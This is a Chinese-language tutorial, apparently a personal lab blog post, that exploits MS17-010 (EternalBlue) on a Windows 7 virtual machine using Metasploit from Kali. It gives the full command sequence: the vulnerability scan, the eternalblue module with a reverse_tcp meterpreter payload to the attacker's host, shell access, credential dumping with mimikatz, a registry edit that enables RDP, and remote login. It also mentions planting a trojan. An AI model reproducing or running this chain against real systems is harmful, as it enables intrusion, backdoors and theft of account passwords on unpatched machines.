MSF之ms17-010永恒之蓝漏洞利用

准备

实验准备环境：
被攻击机：虚拟机win7x64位系统,其IP为：10.101.2.11（关闭了防火墙）
攻击机：虚拟机kali系统，其IP为：192.168.207.130
攻击工具：kali自带的msfconsole工具

扫描漏洞

在kali终端中输入msfconsole

msf >use auxiliary/scanner/smb/smb_ms17_010（加载扫描exp）
msf >set RHOSTS 10.101.2.11（设置被扫描IP）
msf >run(进行扫描，观察是否存在该漏洞)

由上图可知，存在MS17-010漏洞

漏洞攻击

use exploit/windows/smb/ms17_010_eternalblue (加载攻击模块)
set RHOST 10.101.2.11（被攻击机IP）
set LHOST 192.168.207.130（设置本地IP）
set LPORT 4444(设置连接端口)
set payload windows/x64/meterpreter/reverse_tcp（配置回链方式）

show options(查看配置相关信息)

meterpreter >exploit（开始攻击）

攻击成功！

sysinfo爆出系统信息
screenshot截屏，截屏后的图片存放在/root/中

meterpreter >shell，进入靶机cmd

此时，可以新建文件夹，然后
meterpreter >upload植入已经写好的木马！<此中方法，以后再做>

也可以通过使用msf中的mimikatz，来爆出靶机的用户名和密码，以下是其过程：
首先

netstat -an< 查靶机端口开发情况>

如果没有开启3389端口，可以使用以下命令再cmd中开启：

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

其次

meterpreter > load mimikatz
meterpreter > help

meterpreter > msv <获取的是hash值>

meterpreter > ssp <获取的是明文信息>

meterpreter > wdigest <读取内存中存放的账号密码明文信息>

meterpreter > kerberos <同widgest类似，我也没有弄清楚，如果大佬知道，还望指点>

接下来，就是远程登录靶机

rdesktop 10.101.2.11

成功！